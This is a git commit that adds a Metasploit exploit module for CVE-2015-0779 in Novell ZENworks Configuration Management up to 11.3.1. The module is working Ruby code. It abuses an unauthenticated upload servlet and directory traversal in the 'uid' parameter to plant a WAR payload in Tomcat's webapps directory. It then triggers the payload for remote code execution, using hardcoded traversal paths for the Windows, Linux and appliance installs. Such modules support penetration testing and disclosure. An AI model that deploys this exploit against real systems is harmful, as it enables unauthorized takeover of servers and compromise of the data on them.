Create zcm_file_upload.rb

2015-04-07 16:05:51 +01:00 · 2015-04-07 16:05:51 +01:00 · cf8b92b747
parent 6516cab5be
commit cf8b92b747
1 changed files with 127 additions and 0 deletions
--- a/modules/exploits/multi/http/zcm_file_upload.rb
+++ b/modules/exploits/multi/http/zcm_file_upload.rb
@ -0,0 +1,127 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Novell ZENworks Configuration Management Arbitrary File Upload',
+      'Description' => %q{
+        This module exploits a file upload vulnerability in Novell ZENworks
+        Configuration Management (ZCM, which is part of the ZENworks Suite).
+        The vulnerability exists in UploadServlet which accepts unauthenticated
+        file uploads and does not check the "uid" parameter for directory traversal
+        characters. This allows an attacker to write anywhere in the file system,
+        and can be abused to deploy a WAR file in the Tomcat webapps directory.
+        ZCM up to (and including) 11.3.1 is vulnerable to this attack. This module
+        has been tested successfully with ZCM 11.3.1 on Windows and Linux. Note
+        that this is a similar vulnerability to ZDI-10-078 / OSVDB-63412 which also
+        has a Metasploit exploit, but it abuses a different parameter of the same
+        servlet.
+      },
+      'Author'       =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', '2015-0779' ],
+          [ 'OSVDB', 'TODO' ],
+          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/zenworks_zcm_rce.txt' ],
+          [ 'URL', 'FULLDISC_URL' ]
+        ],
+      'DefaultOptions' => { 'WfsDelay' => 30 },
+      'Privileged'  => true,
+      'Platform'    => 'java',
+      'Arch'        => ARCH_JAVA,
+      'Targets'     =>
+        [
+          [ 'Novell ZCM < v11.3.2 - Universal Java', { } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Apr 7 2015'))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptBool.new('SSL',
+          [ true, "Use SSL", true ]),
+        OptString.new('TARGETURI',
+          [ true, "The base path to ZCM / ZENworks Suite", '/zenworks/' ]),
+        OptString.new('TOMCAT_PATH',
+          [ false, "The Tomcat webapps traversal path (from the temp directory)", '' ]),
+        OptInt.new('SLEEP',
+          [ true, 'Seconds to sleep while we wait for WAR deployment', 15 ]),
+      ], self.class)
+  end
+
+
+  def check
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], 'UploadServlet'),
+      'method' => 'GET'
+    })
+    if res && res.code == 200 && res.body.to_s =~ /ZENworks File Upload Servlet/
+      return Exploit::CheckCode::Detected
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+
+  def upload_war_and_exec(tomcat_path)
+    app_base = rand_text_alphanumeric(4 + rand(32 - 4))
+    war_payload = payload.encoded_war({ :app_name => app_base }).to_s
+
+    print_status("#{peer} - Uploading WAR file to #{tomcat_path}")
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], 'UploadServlet'),
+      'method' => 'POST',
+      'data' => war_payload,
+      'ctype' => 'application/octet-stream',
+      'vars_get' => {
+        'uid' => tomcat_path,
+        'filename' => app_base + ".war"
+      }
+    })
+    if res && res.code == 200
+      print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s +
+      " seconds for deployment")
+      sleep(datastore['SLEEP'])
+    else
+      print_error("#{peer} - Failed to upload, try again with a different path?")
+      return false
+    end
+
+    print_status("#{peer} - Executing payload, wait for session...")
+    send_request_cgi({
+      'uri'    => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
+      'method' => 'GET'
+    })
+    return true
+  end
+
+
+  def exploit
+    if datastore['TOMCAT_PATH'] != ''
+      if not upload_war_and_exec(datastore['TOMCAT_PATH'])
+        return
+      end
+    else
+      # These paths should cover the Virtual Appliance, Windows and SLES installations
+      tomcat_paths = [ '../../../opt/novell/zenworks/share/tomcat/webapps/', '../webapps/' ]
+      if not upload_war_and_exec(tomcat_paths[0])
+        if not upload_war_and_exec(tomcat_paths[1])
+          return
+        end
+      end
+    end
+  end
+end